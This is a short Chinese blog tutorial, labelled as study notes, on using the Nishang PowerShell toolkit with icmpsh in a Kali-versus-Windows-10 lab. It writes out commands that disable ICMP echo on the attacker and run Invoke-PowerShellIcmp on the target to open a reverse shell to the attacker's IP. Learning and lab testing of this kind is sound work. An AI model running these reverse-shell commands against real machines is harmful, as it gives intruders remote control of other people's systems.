基于powershell的渗透测试工具nishang

本文为学习笔记,仅限学习交流。
不得利用、从事危害国家或人民安全、荣誉和利益等活动。
请参阅《中华人民共和国网络安全法》

Nishang是一款针对PowerShell的渗透工具。
先到github上去下载nishang,并解压
目标机下载nishang 地址:https://github.com/samratashok/nishang
攻击机下载icmpsh 地址:git clone https://github.com/inquisb/icmpsh.git

简介:
1,攻击机kali; 目标机 win10
2,win10开启PowerShell (3.0以上的环境中才可使用;win10自带5.1)
3,导入PowerShell框架
4,获取命令-nishang模块
5,kali安装icmpsh工具

第一, 目标机配置部分::
nishang的使用是要在PowerShell 3.0以上的环境中才可使用(win10自带5.1)
在这里插入图片描述
查看版本 Get-host
在这里插入图片描述
PowerShell框架是需要导入的
命令:Import-Module nishang地址

Import-Module D:\nishang\nishang-master\nishang.psm1
在这里插入图片描述
在这里插入图片描述
获取命令-nishang模块
Get-Command -Module nishang

在这里插入图片描述
第二,(Kali)攻击机配置部分:
进入kali中icmpsh目录下,输入命令sysctl -w net.ipv4.icmp_echo_ignore_all=1来禁止ICMP回显

./icmpsh_m.py kaliIP 本机IP
./icmpsh_m.py 192.168.0.33 192.168.0.180

在这里插入图片描述
在win10中输入命令Invoke-PowerShellIcmp -IPAddress 192.168.0.33并执行
即在kali中拿到shell。

发布了43 篇原创文章 · 获赞 39 · 访问量 7589

猜你喜欢

转载自blog.csdn.net/AmyBaby00/article/details/103196202
今日推荐